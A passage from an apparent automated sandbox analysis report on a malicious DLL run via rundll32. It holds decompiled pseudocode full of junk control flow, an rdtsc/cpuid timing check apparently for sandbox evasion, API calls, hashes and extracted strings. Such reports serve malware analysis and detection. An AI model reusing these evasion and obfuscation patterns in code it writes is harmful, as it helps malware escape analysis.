      				_t132 = _a136;
      				_t76 =  *((intOrPtr*)(_t132 + 8));
      				if (__ebx == __ebx) goto 0x65c537ff;
      				 *_a136 = _t132;
      				_t133 = _a136;
      				r8d = r8d + 0xf;
      				if (0 == 0) goto 0x65c5386e;
      				_t152 = _a136;
      				_t77 = E00007FFA7FFA65C58E8D(_t76, _t140, _t152, _t155, _t156, _t157, _t158, _t161, _t162, _t164, _t165, _t166, _t167, _t168);
      				if (0 == 0) goto 0x65c538b6;
      				_a36 = _a36 + 0x24;
      				_a37 = 5;
      				goto 0x65c53898;
      				_a37 = _a37 + 0x73;
      				r8d = 0;
      				goto 0x65c5374d;
      				_a56 = _t133;
      				_a36 = 0xc;
      				if (_t77 == _t77) goto 0x65c5388c;
      				_t78 = _t77 / _t152;
      				if (_t78 == _t78) goto 0x65c53880;
      				_a72 = _a40;
      				goto 0x65c5391b;
      				_t159 = _t159 - 0x78;
      				goto 0x65c53b2c;
      				_v104 = _t155;
      				_v112 = _t152;
      				if (__esi == __esi) goto 0x65c538d3;
      				_t152 =  *_a8;
      				E00007FFA7FFA65C590C0( *((intOrPtr*)(_a40 + 8)), _a8, _t140,  *_a8, _t155, _t156, _t157, _t162, _t163, _t164, _t165, _t167, _t168);
      				goto 0x65c53b3f;
      				goto 0x65c538a8;
      				if ( *_a8 == 0) goto 0x65c53900;
      				_t78 = 0;
      				goto 0x65c53900;
      				_v80 = _v48;
      				goto L8;
      				_v87 = __al;
      				goto 0x65c53b1e;
      				__rcx = _a16;
      				__eax = E00007FFA7FFA65C58E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
      				if (__ah == __ah) goto 0x65c5399d;
      				_v88 = __al;
      				__rax = _v72;
      				if (__dx == __dx) goto 0x65c53990;
      				r8d = r8d + 0xf;
      				__edx = 0;
      				if (__dl == __dl) goto 0x65c53934;
      				__rax = __rcx;
      				__al =  *__rax;
      				if (__bx == __bx) goto 0x65c53945;
      				__rcx = _a16;
      				__r8 =  *__rcx;
      				__eax = E00007FFA7FFA65C53B56(__ecx, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
      				goto 0x65c53b0f;
      				__rax = __rcx;
      				__al =  *((intOrPtr*)(__rax + 1));
      				if (__di == __di) goto 0x65c53927;
      				_v64 = _v64 + __rax;
      				if (__ax == __ax) goto 0x65c53985;
      				__eax = E00007FFA7FFA65C5A588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
      				__rax =  *((intOrPtr*)(__rax + 0x60));
      				goto 0x65c53967;
      				if (__eax != 0) goto 0x65c539b9;
      				if (_v80 - 2 < 0) goto 0x65c539b9;
      				goto E00007FFA7FFA65C536FA;
      				_v80 = _v80 >> 1;
      				goto 0x65c5373d;
      				__rsp = __rsp + 0x78;
      				return __eax;
      			}

      Instruction addresses (one per decompiled statement above): 0x7ffa65c536fa, 0x7ffa65c536ff, 0x7ffa65c53706, 0x7ffa65c53708, 0x7ffa65c5370d, 0x7ffa65c53712, 0x7ffa65c5371f, 0x7ffa65c53721, 0x7ffa65c53726, 0x7ffa65c5372d, 0x7ffa65c5372f, 0x7ffa65c53734, 0x7ffa65c5373b, 0x7ffa65c53745, 0x7ffa65c5374b, 0x7ffa65c5374d, 0x7ffa65c53759, 0x7ffa65c53765, 0x7ffa65c53767, 0x7ffa65c5376c, 0x7ffa65c53776, 0x7ffa65c53786, 0x7ffa65c5378a, 0x7ffa65c53791, 0x7ffa65c53793, 0x7ffa65c5379c, 0x7ffa65c537a1, 0x7ffa65c537b3, 0x7ffa65c537b5, 0x7ffa65c537b8, 0x7ffa65c537be, 0x7ffa65c537c8, 0x7ffa65c537ca, 0x7ffa65c537cd, 0x7ffa65c537d5, 0x7ffa65c537df, 0x7ffa65c537e9, 0x7ffa65c537eb, 0x7ffa65c537f0, 0x7ffa65c537fa, 0x7ffa65c537ff, 0x7ffa65c53804, 0x7ffa65c5380c, 0x7ffa65c5380e, 0x7ffa65c53818, 0x7ffa65c53826, 0x7ffa65c53832, 0x7ffa65c53834, 0x7ffa65c53843, 0x7ffa65c53845, 0x7ffa65c5384d, 0x7ffa65c53852, 0x7ffa65c53854, 0x7ffa65c53857, 0x7ffa65c53864, 0x7ffa65c5386c, 0x7ffa65c5386e, 0x7ffa65c53876, 0x7ffa65c5388a, 0x7ffa65c5388c, 0x7ffa65c53891, 0x7ffa65c53896, 0x7ffa65c53898, 0x7ffa65c5389d, 0x7ffa65c538a3, 0x7ffa65c538a8, 0x7ffa65c538ad, 0x7ffa65c538b4, 0x7ffa65c538b6, 0x7ffa65c538c7, 0x7ffa65c538cc, 0x7ffa65c538d1, 0x7ffa65c538d3, 0x7ffa65c538df, 0x7ffa65c538e4, 0x7ffa65c538e9, 0x7ffa65c538f1, 0x7ffa65c538f3, 0x7ffa65c538f6, 0x7ffa65c538fb, 0x7ffa65c5390b, 0x7ffa65c53910, 0x7ffa65c53912, 0x7ffa65c53919, 0x7ffa65c53920, 0x7ffa65c53925, 0x7ffa65c53927, 0x7ffa65c5392f, 0x7ffa65c53934, 0x7ffa65c5393c, 0x7ffa65c53943, 0x7ffa65c53945, 0x7ffa65c53949, 0x7ffa65c53951, 0x7ffa65c53953, 0x7ffa65c53957, 0x7ffa65c5395b, 0x7ffa65c5395d, 0x7ffa65c53960, 0x7ffa65c53965, 0x7ffa65c53967, 0x7ffa65c5396f, 0x7ffa65c5397b, 0x7ffa65c53980, 0x7ffa65c53985, 0x7ffa65c53988, 0x7ffa65c5398e, 0x7ffa65c53995, 0x7ffa65c5399b, 0x7ffa65c5399d, 0x7ffa65c539a2, 0x7ffa65c539a6, 0x7ffa65c539aa, 0x7ffa65c539b2, 0x7ffa65c539b4, 0x7ffa65c539be, 0x7ffa65c539c1, 0x7ffa65c539c6, 0x7ffa65c539ca

      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
      • Instruction ID: 70f0e49089979b9ab97185af633e2a2f9cdfccadbacfd0d51cbf35581ec70845
      • Opcode Fuzzy Hash: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
      • Instruction Fuzzy Hash: E831C267D1CA86C9EB709F95D45037DA7A1EB82F82F94C036D78E47B94CE2CD8A48700
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 72%
      			E00007FFA7FFA65C531F1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __esp, void* __rdx, void* __rdi, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r14, void* __r15, void* _a48, char _a72, short _a80, short _a82, short _a84, short _a86, short _a88, signed long long _a296, signed long long _a304, char _a320, char _a321, unsigned int _a328, signed long long _a336, intOrPtr _a344, unsigned int _a360, void* _a368, intOrPtr* _a416, signed long long _a424, intOrPtr _a441, char _a444, char _a445, signed long long _a448, unsigned int _a456, signed int _a460, signed long long _a464, signed int _a472, signed long long _a480, signed long long _a482, signed long long _a484, signed long long _a486, signed long long _a488, signed long long _a496, signed long long _a504, signed long long* _a544, intOrPtr _a552, intOrPtr _a556, intOrPtr _a560, intOrPtr _a564, intOrPtr _a568, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, intOrPtr _a584, intOrPtr _a588, intOrPtr _a592, intOrPtr _a632, intOrPtr _a636, intOrPtr _a640, intOrPtr _a648, intOrPtr _a652, intOrPtr _a656, intOrPtr _a660, intOrPtr _a664, intOrPtr _a668, intOrPtr _a672, intOrPtr _a676, intOrPtr _a716, intOrPtr _a720, intOrPtr _a724, intOrPtr _a728, intOrPtr _a732, intOrPtr _a736, intOrPtr _a740, intOrPtr _a744, intOrPtr _a748, intOrPtr _a752, intOrPtr _a756, intOrPtr _a760, intOrPtr _a764, intOrPtr _a768, signed long long _a776) {
      				struct HINSTANCE__* _t207;
      				signed int _t215;
      				void* _t216;
      				signed int _t221;
      				signed long long _t274;
      				void* _t279;
      
      				_t274 =  &_a72;
      				_t207 = LoadLibraryW(??);
      				if (_t207 == _t207) goto 0x65c5324d;
      				_a86 = _t207 + 0x1e;
      				if (__ebx == __ebx) goto 0x65c5320d;
      				_a88 = 0;
      				if (__ecx == __ecx) goto 0x65c531f1;
      				_a84 = 0;
      				if (__ecx == __ecx) goto 0x65c53201;
      				if (0x33 == 0x33) goto 0x65c53218;
      				_a80 = 0x33;
      				if (__edx == __edx) goto 0x65c53241;
      				_a82 = 0x69;
      				if (__ebx == __ebx) goto 0x65c53226;
      				if (__ebp == __ebp) goto 0x65c531e5;
      				_t215 = 0x69 +  *((intOrPtr*)(_t279 + 0xf0 + _t274 * 4));
      				if (0x57 - 0x1f4 <= 0) goto 0x65c53276;
      				 *((intOrPtr*)(_t279 + 0x70 + _t274 * 4)) = 0x57;
      				goto 0x65c5310c;
      				goto 0x65c5361e;
      				_t216 = _t215 + 1;
      				_t279 = _t279 + 0x198;
      				goto 0x65c52f67;
      				_a560 = _a560 + 4;
      				_a564 = 0x9a;
      				if (__esi == __esi) goto 0x65c5336a;
      				_a568 = _a568 + 0x18;
      				_a572 = 0xd;
      				if (__ebp == __ebp) goto 0x65c5333a;
      				_a588 = _a588 + 2;
      				_a592 = 0x19e8;
      				goto E00007FFA7FFA65C52E95;
      				_a584 = _a584 + 0x3b;
      				_a588 = 0x17;
      				goto 0x65c532c3;
      				_a580 = _a580 + 0x5e;
      				_a584 = 0x1b;
      				if (_t216 == _t216) goto 0x65c532db;
      				_a556 = _a556 + 7;
      				_a560 = 0x3f;
      				if (0x2733d478 == 0x2733d478) goto 0x65c5328f;
      				_a576 = _a576 + 0x18;
      				_a580 = 0x1af;
      				if (__ebp == __ebp) goto 0x65c532f0;
      				_a572 = _a572 + 0xb;
      				_a576 = 0x3e;
      				if (0x2733d478 == 0x2733d478) goto 0x65c53322;
      				_a552 = _a552 + 0x54;
      				_a556 = 0x12;
      				if (__ebx == __ebx) goto 0x65c53307;
      				_a564 = _a564 + 0x5b;
      				_a568 = 0x3e;
      				if (__ebp == __ebp) goto 0x65c532ab;
      				_a672 = _a672 + 0x40;
      				_a676 = 0x111;
      				goto E00007FFA7FFA65C53087;
      				_a636 = _a636 + 0xa;
      				_a640 = 0x25;
      				if (_t216 == _t216) goto 0x65c533d0;
      				_a652 = _a652 + 0x85;
      				_a656 = 0x182e;
      				if (0x2733d478 == 0x2733d478) goto 0x65c533ff;
      				_a640 = _a640 + 5;
      				_a648 = 0x332;
      				if (__esi == __esi) goto 0x65c53450;
      				_a660 = _a660 + 0x3a;
      				_a664 = 0x9e;
      				if (_t216 == _t216) goto 0x65c5346b;
      				_a656 = _a656 + 0xf4;
      				_a660 = 0x12;
      				if (_t216 == _t216) goto 0x65c533e8;
      				_a668 = _a668 + 0x8b;
      				_a672 = 0x16;
      				goto 0x65c53386;
      				_a632 = _a632 + 0x2d;
      				_a636 = 0x41;
      				if (_t216 == _t216) goto 0x65c5339e;
      				_a648 = _a648 + 3;
      				_a652 = 0xc0;
      				if (_t216 == _t216) goto 0x65c533b6;
      				_a664 = _a664 + 0xce;
      				_a668 = 0x1cf6;
      				if (__edx == __edx) goto 0x65c53419;
      				asm("dec eax");
      				asm("in al, 0x63");
      				asm("dec eax");
      				asm("dec eax");
      				_a744 = _a744;
      				_a748 = 0xd9;
      				if (__edx == __edx) goto 0x65c534db;
      				_a748 = _a748 + 0x81;
      				_a752 = 0x18f;
      				goto 0x65c5358a;
      				_a724 = _a724 + 0x8f;
      				_a728 = 0x24b;
      				if (__edx == __edx) goto 0x65c53558;
      				_a732 = _a732 + 0x3c;
      				_a736 = 6;
      				if (__edx == __edx) goto 0x65c53541;
      				_a716 = _a716 + 0x12;
      				_a720 = 0x19cc;
      				if (__edx == __edx) goto 0x65c535a2;
      				_a736 = _a736 + 0x27;
      				_a740 = 0x35;
      				if (__edx == __edx) goto 0x65c5356f;
      				_a728 = _a728 + 0x30;
      				_a732 = 0x1d29;
      				if (__edx == __edx) goto 0x65c53511;
      				_a740 = _a740 + 0x17;
      				_a744 = 0x7b;
      				if (__edx == __edx) goto 0x65c534c3;
      				_a752 = _a752 + 0xff;
      				_a756 = 9;
      				goto 0x65c535c0;
      				_a720 = _a720 + 0xa0;
      				_a724 = 0x5c;
      				if (__edx == __edx) goto 0x65c534f6;
      				_a756 = _a756 + 0x10;
      				_a760 = 0x1f;
      				if (0x2733d478 == 0x2733d478) goto 0x65c53631;
      				_a764 = _a764 + 0xf;
      				_a768 = 0x27;
      				if (0x2733d478 == 0x2733d478) goto 0x65c535f7;
      				asm("cdq");
      				if (__ebp == __ebp) goto 0x65c53649;
      				_a768 = _a768 + 3;
      				_a456 = 0;
      				goto 0x65c530ef;
      				goto 0x65c52f9f;
      				if (__ebx == __ebx) goto 0x65c535ef;
      				goto 0x65c53663;
      				_t221 = ( *(_t279 + 0x70 + _a456 * 4) << 1) + 1;
      				_a460 = _t221;
      				goto 0x65c530fb;
      				_a760 = _a760 + 0x24;
      				_a764 = 0x3c;
      				if (__edi == __edi) goto 0x65c535d7;
      				_t215 = _t221 >> 1;
      				_t274 = _a456;
      				goto L1;
      				__rcx = _a460;
      				__eax =  *(__rsp + 0x70 + __rax * 4);
      				goto 0x65c5325a;
      				__rcx = _a456;
      				 *(__rsp + 0x70 + __rcx * 4) =  *(__rsp + 0x70 + __rax * 4);
      				goto 0x65c5310c;
      				_a484 = __ax;
      				__eax = 0x2f;
      				if (__bh == __bh) goto 0x65c536dd;
      				__eax = 0x8b;
      				_a482 = __ax;
      				if (__cx == __cx) goto 0x65c5368c;
      				0x72 = 0x76;
      				if (__bh == __bh) goto 0x65c53671;
      				__ecx = 0x7d676da;
      				__ecx = 0x7d6774c;
      				if (__ch == __ch) goto 0x65c536b0;
      				__eax = 0x2f;
      				__eax = 0x61;
      				if (__dh == __dh) goto 0x65c536c1;
      				__eax = E00007FFA7FFA65C57947(0x61, __ebx, 0x7d6774c, __edx, __edi, __esi, __rax, __rbx, __rcx, __rsi, __r8, __r9, __r11, __r13, __r15);
      				_a776 = __rax;
      				if (__dl == __dl) goto 0x65c536a4;
      				_a480 = __ax;
      				__eax = 8;
      				if (__dx == __dx) goto 0x65c5367f;
      				0x11 = 0x70;
      				goto 0x65c53232;
      				__eax = 0xa2;
      				_a486 = __ax;
      				_a448 = __rax;
      				__rax = _a464;
      				__rax = _a464 + 2;
      				if (__sp == __sp) goto 0x65c53721;
      				__eax = E00007FFA7FFA65C57947(0xa2, __ebx, 0x7d6774c, __edx, __edi, __esi, __rax, __rbx, __rcx, __rsi, __r8, __r9, __r11, __r13, __r15);
      				_a504 = __rax;
      				goto 0x65c53845;
      				__ecx = 0xd45a1e90;
      				__ecx = 0xd45a1e1f;
      				goto 0x65c53708;
      				_a464 = __rax;
      				__rax = _a448;
      				if (__ah == __ah) goto 0x65c536ec;
      				__eax = E00007FFA7FFA65C57947(__eax, __ebx, 0xd45a1e1f, __edx, __edi, __esi, __rax, __rbx, __rcx, __rsi, __r8, __r9, __r11, __r13, __r15);
      				_a496 = __rax;
      				if (__dh == __dh) goto 0x65c53717;
      				__rcx = _a544;
      				_a544[1] = __eax;
      				if (__si == __si) goto 0x65c5375b;
      				r8d = r8d + 2;
      				__rdx =  &_a444;
      				if (__cx == __cx) goto 0x65c53767;
      				__ecx = 0x67cc07ec;
      				__ecx = 0x67cc0818;
      				if (__cl == __cl) goto 0x65c5372f;
      				__rcx = _a464;
      				__eax = E00007FFA7FFA65C58D0B(__eax, 0x67cc0818, __esi, __ebp, __esp, __rax, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r10, __r11, __r12, __r13, __r14);
      				_a504() = 0;
      				__cl = _a441;
      				__eax = E00007FFA7FFA65C53D78(__ecx, __esp, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9, __r13, __r14);
      				if (__cl == __cl) goto 0x65c537c0;
      				__eax = __ecx;
      				__rcx = _a456;
      				if (__dh == __dh) goto 0x65c5379e;
      				__rcx = _a456 >> 1;
      				__rdx = _a544;
      				__edx = 0;
      				__rcx =  *((intOrPtr*)(__rax + 0x30));
      				if (__bh == __bh) goto 0x65c53776;
      				__eax = __eax << 4;
      				_a472 = __eax;
      				if (__ah == __ah) goto 0x65c53786;
      				_a472 = _a472 | __eax;
      				if (__cl == __cl) goto 0x65c53793;
      				__rdx =  *__rdx;
      				 *((char*)(__rdx +  *((intOrPtr*)(__rax + 0x30)))) = __al;
      				goto 0x65c537d7;
      				__eax = 0;
      				__eax = 1;
      				goto 0x65c539c6;
      				if (_a456 - __rax >= 0) goto 0x65c537d7;
      				__rax = _a456;
      				goto 0x65c537f2;
      				_a464 = _a464 + __rax;
      				goto 0x65c5395d;
      				_a488 = __rax;
      				__eax = E00007FFA7FFA65C5A588(1, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
      				if (__di == __di) goto 0x65c5381a;
      				__r8 = __rcx;
      				__edx = 3;
      				if (__bl == __bl) goto 0x65c53828;
      				__rax =  *((intOrPtr*)(__rax + 0x60));
      				__rcx = _a488;
      				if (__sp == __sp) goto 0x65c5380e;
      				__edx = 8;
      				__rcx =  *((intOrPtr*)(__rax + 0x30));
      				if (__sp == __sp) goto 0x65c53834; // executed
      				__eax = RtlAllocateHeap(??, ??, ??);
      				__rcx = _a544;
      				if (__di == __di) goto 0x65c53854;
      				__rax = _a544;
      				__eax =  *(__rax + 8);
      				if (__bl == __bl) goto 0x65c537ff;
      				 *_a544 = __rax;
      				__rax = _a544;
      				r8d = r8d + 0xf;
      				__edx = 0;
      				if (__dh == __dh) goto 0x65c5386e;
      				__rcx = _a544;
      				__eax = E00007FFA7FFA65C58E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
      				__ecx = 2;
      				__ecx = 2;
      				if (__dl == __dl) goto 0x65c538b6;
      				_a444 = _a444 + 0x24;
      				_a445 = 5;
      				goto 0x65c53898;
      				_a445 = _a445 + 0x73;
      				r8d = 0;
      				goto 0x65c5374d;
      				_a464 = __rax;
      				_a444 = 0xc;
      				if (__ah == __ah) goto 0x65c5388c;
      				_t183 = __eax % __rcx;
      				__eax = __eax / __rcx;
      				__edx = _t183;
      				__rax = __rdx;
      				__edx = 0;
      				__rax = _a448;
      				if (__ah == __ah) goto 0x65c53880;
      				__eax =  *(__rax + 8);
      				_a480 = __rax;
      				goto 0x65c5391b;
      				__rsp = __rsp - 0x78;
      				__rax = _a416;
      				goto 0x65c53b2c;
      				_a304 = __rdx;
      				_a296 = __rcx;
      				if (__si == __si) goto 0x65c538d3;
      				__rcx =  *__rax;
      				__eax = E00007FFA7FFA65C590C0(__eax, __rax, __rbx,  *__rax, __rdx, __rdi, __rsi, __r9, __r10, __r11, __r12, __r14, __r15);
      				goto 0x65c53b3f;
      				_a416 =  *_a416;
      				goto 0x65c538a8;
      				if ( *_a416 == 0) goto 0x65c53900;
      				__eax = 0;
      				goto 0x65c53900;
      				__rax = _a360;
      				_a328 = _a360;
      				goto L12;
      				_a321 = __al;
      				__cl = _a320;
      				goto 0x65c53b1e;
      				__rcx = _a424;
      				__eax = E00007FFA7FFA65C58E8D(0, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
      				if (__ah == __ah) goto 0x65c5399d;
      				_a320 = __al;
      				__rax = _a336;
      				if (__dx == __dx) goto 0x65c53990;
      				r8d = r8d + 0xf;
      				__edx = 0;
      				if (__dl == __dl) goto 0x65c53934;
      				__rax = __rcx;
      				__al =  *__rax;
      				if (__bx == __bx) goto 0x65c53945;
      				__rcx = _a424;
      				__r8 =  *__rcx;
      				__cl = _a321;
      				__eax = E00007FFA7FFA65C53B56(2, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
      				goto 0x65c53b0f;
      				__rax = __rcx;
      				__al =  *((intOrPtr*)(__rax + 1));
      				if (__di == __di) goto 0x65c53927;
      				_a344 = _a344 + __rax;
      				if (__ax == __ax) goto 0x65c53985;
      				__eax = E00007FFA7FFA65C5A588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
      				__rax =  *((intOrPtr*)(__rax + 0x60));
      				goto 0x65c53967;
      				if (__eax != 0) goto 0x65c539b9;
      				if (_a328 - 2 < 0) goto 0x65c539b9;
      				goto L4;
      				_a328 = _a328 >> 1;
      				goto 0x65c5373d;
      				__rsp = __rsp + 0x78;
      				return __eax;
      			}

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.432207126.00007FFA65C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA65C50000, based on PE: true
      • Associated: 00000003.00000002.432202126.00007FFA65C50000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000003.00000002.432372505.00007FFA65CA9000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ffa65c50000_rundll32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 7b9e8d97665da511a8bf5de6eed225a773ea96b32157c8bba84cb86c8fe4244b
      • Instruction ID: e879d57eb30cff458aecad0b2afacb50aaaf478de57b046397ee4c838feff8b5
      • Opcode Fuzzy Hash: 7b9e8d97665da511a8bf5de6eed225a773ea96b32157c8bba84cb86c8fe4244b
      • Instruction Fuzzy Hash: B621A623D1C581CAE7A08FE8E44437A6291EB82F02F988035E78E476D5DE1CE8549B10
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 436 18000244c-180002453 437 180002474-18000247d 436->437 438 180002455-18000246e CreateThread 436->438 438->437
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
      • Instruction ID: 91c5236132e037b4dad52b7741e0f6a58db73a54ac04ee9c9214898af67bde3f
      • Opcode Fuzzy Hash: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
      • Instruction Fuzzy Hash: 38D05E72A1024483E775D720A5063A93321A398359F80C205E64908954CF7DC25CC705
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 67%
      			E00000001180002AC0(void* __eflags, signed int __rax, long long __rbx, signed int __rdx, long long __rsi) {
      				signed int _t18;
      				intOrPtr _t20;
      				intOrPtr _t22;
      				signed long long _t42;
      				long long _t52;
      				void* _t55;
      				void* _t56;
      
      				 *((long long*)(_t55 + 8)) = __rbx;
      				 *((long long*)(_t55 + 0x10)) = _t52;
      				 *((long long*)(_t55 + 0x18)) = __rsi;
      				_t56 = _t55 - 0x30;
      				SwitchToThread();
      				asm("rdtsc");
      				_t42 = __rdx << 0x20;
      				asm("cpuid");
      				 *((intOrPtr*)(_t56 + 0x20)) = 1;
      				 *((intOrPtr*)(_t56 + 0x24)) = _t20;
      				 *((intOrPtr*)(_t56 + 0x28)) = 0;
      				 *((intOrPtr*)(_t56 + 0x2c)) = _t22;
      				asm("rdtsc");
      				_t43 = _t42 << 0x20;
      				_t18 = SwitchToThread();
      				asm("rdtsc");
      				asm("rdtsc");
      				if (__eflags != 0) goto 0x80002adb;
      				return _t18 / (__rsi + ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020 | _t43 << 0x00000020 << 0x00000020) - ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020));
      			}

      APIs
      • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002ADB
      • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002B15
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: SwitchThread
      • String ID:
      • API String ID: 115865932-0
      • Opcode ID: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
      • Instruction ID: 31e80d72c3d44f8f19491c3afcfcc8ffca94b91b5460d3bc01de11eb56bf2daf
      • Opcode Fuzzy Hash: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
      • Instruction Fuzzy Hash: 93019EB2B24A948BDF64CB26B600389B6A2E38C7C0F14C535EB9D43B18DA3CD5958B04
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf$AddressLibraryLoadProc
      • String ID: %s%u$; _gat=$NTDLL.DLL$RtlGetVersion
      • API String ID: 1873754389-181482773
      • Opcode ID: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
      • Instruction ID: b0e16dee8d78cd610c3fce9f61b73237315bc0fd6264dbce3c4a8d294556f37b
      • Opcode Fuzzy Hash: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
      • Instruction Fuzzy Hash: A1311872B00A4991EA62DB11F854BE97360FB9CBC5F848126EA0D67B65DF3CC61EC340
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: lstrcpy$lstrcat$FolderPath
      • String ID: c:\ProgramData\
      • API String ID: 2440492483-4167965204
      • Opcode ID: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
      • Instruction ID: 13a3a00d3bf98ac6014c4b177c238986472ee82a99ac8020d1391539c79a1c4f
      • Opcode Fuzzy Hash: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
      • Instruction Fuzzy Hash: A8213472204B84C6EB52DF21E8043EAB765F758BC4F888021EE990BB69CF78C25DC714
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: lstrcat$CreateDirectoryFolderPathlstrcpy
